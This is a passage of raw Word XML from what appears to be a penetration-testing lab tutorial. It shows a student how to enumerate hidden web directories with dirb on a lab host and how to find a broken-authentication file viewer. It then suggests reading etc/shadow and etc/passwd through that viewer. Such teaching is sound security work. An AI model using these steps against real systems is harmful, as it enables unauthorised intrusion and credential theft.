          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> say </w:t>
      </w:r>
      <w:r w:rsidR="00E567C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and slap that address in the URL bar. You are now </w:t>
      </w:r>
      <w:r w:rsidR="00E567C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interacting with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the server that belongs to that ip address port, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a </w:t>
      </w:r>
      <w:r w:rsidR="00E567C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>webserver</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. (Viewing webpages). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF1227" w14:textId="385E93B6" w:rsidR="0002028E" w:rsidRDefault="0002028E"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Start by viewing the page, and then right clicking and viewing the “page source” and view the source code that is the backbone of the web page you are viewing. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C123F" w14:textId="2557B4FE" w:rsidR="00E567C9" w:rsidRDefault="00E567C9" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>But what you’re looking for is hidden “end points” that is directories and files that aren’t directly accessible via the web-app you are looking at. (no hyper-link or site map to take you to all the pages)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40901B59" w14:textId="7C7676BE" w:rsidR="00EF4D62" w:rsidRDefault="00EF4D62" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67B658A6" wp14:editId="2F996AF5">
            <wp:extent cx="4200525" cy="1020512"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="191612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2407" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4240952" cy="1030334"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="026BED51" w14:textId="725D8C24" w:rsidR="00E567C9" w:rsidRDefault="009951E3" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>So,</w:t>
      </w:r>
      <w:r w:rsidR="00E567C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> you “walk the app” using “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00E567C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E567C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1FFD4F" w14:textId="77777777" w:rsidR="0047632A" w:rsidRDefault="0047632A" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32386FDA" w14:textId="77777777" w:rsidR="0047632A" w:rsidRDefault="0047632A" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235E7C8D" w14:textId="77777777" w:rsidR="0047632A" w:rsidRDefault="0047632A" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="082073A2" w14:textId="77777777" w:rsidR="0047632A" w:rsidRDefault="0047632A" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07087381" w14:textId="7ADCEA96" w:rsidR="00E567C9" w:rsidRPr="0026026D" w:rsidRDefault="00E567C9" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0026026D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Step 4. Dirb: (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0026026D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>dir-B</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0026026D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0026026D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B6E2D0" w14:textId="67D8ACD2" w:rsidR="00E567C9" w:rsidRDefault="00E567C9"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Dirb </w:t>
      </w:r>
      <w:r w:rsidRPr="00E567C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>discover</w:t>
      </w:r>
      <w:r w:rsidR="009951E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00E567C9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hidden directories and files on a web server by launching a dictionary-based attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The command is generally: “dirb </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="004979F2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>http://{ipaddress}/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2FF975A9" w14:textId="6C203335" w:rsidR="00EF4D62" w:rsidRDefault="00EF4D62" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A595E15" wp14:editId="0A15980C">
            <wp:extent cx="3419475" cy="1259287"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="717350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50572" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3429257" cy="1262889"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="100F2B67" w14:textId="524307C5" w:rsidR="00E567C9" w:rsidRDefault="00E567C9" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>And what dirb will do is take common webpage address words and put them at the end of the //{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ipaddress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">}/ &lt;- final slash. Because that’s all a web-server doers. An index of pages and directories. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2C8D5D" w14:textId="3C15D505" w:rsidR="00E567C9" w:rsidRDefault="009D16B7"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(note you can use -o </w:t>
      </w:r>
      <w:r w:rsidR="009951E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">or “tee” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>and a filename, like “output.txt” to deliver the scan to a readable file saved for later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D69FE4F" w14:textId="60ABE71B" w:rsidR="008E7D6B" w:rsidRDefault="008E7D6B"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Using this you can visit all the </w:t>
      </w:r>
      <w:r w:rsidR="00874D05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>directories that are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> not obvious and see if there are vulnerabilities, such as other information such as OS or Service operating and their versions, IP addresses, ports in use, or any </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> apps etc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(Make sure you record all vulnerabilities you find)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6B830F" w14:textId="7E1749E6" w:rsidR="008E7D6B" w:rsidRDefault="008E7D6B" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In the case of our lab, we see that we found 192.168.122.47/console/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>view.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is the vulnerability we will exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4317F238" w14:textId="2C88CB2D" w:rsidR="008E7D6B" w:rsidRPr="00EF4D62" w:rsidRDefault="008E7D6B" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5. </w:t>
      </w:r>
      <w:r w:rsidR="00874D05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Finding</w:t>
      </w:r>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> a web application </w:t>
      </w:r>
      <w:r w:rsidR="00874D05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>vulnerability</w:t>
      </w:r>
      <w:r w:rsidR="0026026D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F7819F" w14:textId="09277C61" w:rsidR="008E7D6B" w:rsidRDefault="008E7D6B" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E7D6B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PHP (Hypertext Preprocessor) is a popular general-purpose scripting language that is especially suited for web development. It is a server-side scripting language, meaning that PHP code is executed on the server rather than on the client's browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C51320E" w14:textId="70934F6C" w:rsidR="008E7D6B" w:rsidRDefault="008E7D6B"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The fist thing to do is to validate the app is working, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>i.e.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> do the credentials/forms work?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6017D9" w14:textId="2AE070DF" w:rsidR="008E7D6B" w:rsidRDefault="00EF4D62" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF4D62">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F56DAEC" wp14:editId="15B2D501">
            <wp:extent cx="5943600" cy="2226310"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="209653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34271" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2226310"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55785C17" w14:textId="674AEDC3" w:rsidR="00EF4D62" w:rsidRDefault="0026026D"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Here we are trying to read the files that are “current files in the directory:” </w:t>
      </w:r>
      <w:r w:rsidR="00874D05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>i.e.,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> humans.txt, robots.txt, etc. We likely wouldn’t be able to read this without a proper username or admin ID. That we can is </w:t>
      </w:r>
      <w:r w:rsidRPr="0026026D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>“Unexpected Behavior”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, this is a “high” vulnerability, known as “broken authentication,” which is probably why we can access these protected files. (This is unlikely to be found in the real world but test it anyway, here the admin name and id forms are broken). So, if you can read these files. Maybe you can read others.  </w:t>
      </w:r>
      <w:r w:rsidR="00874D05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Like… etc/shadow or etc/passwd (remember that most webservers operate on linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E99C147" w14:textId="24B744D5" w:rsidR="00874D05" w:rsidRDefault="00874D05" w:rsidP="000D62A5">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00874D05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25D853AE" wp14:editId="290F518D">
            <wp:extent cx="5943600" cy="1428115"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="73450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08196" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1428115"/>
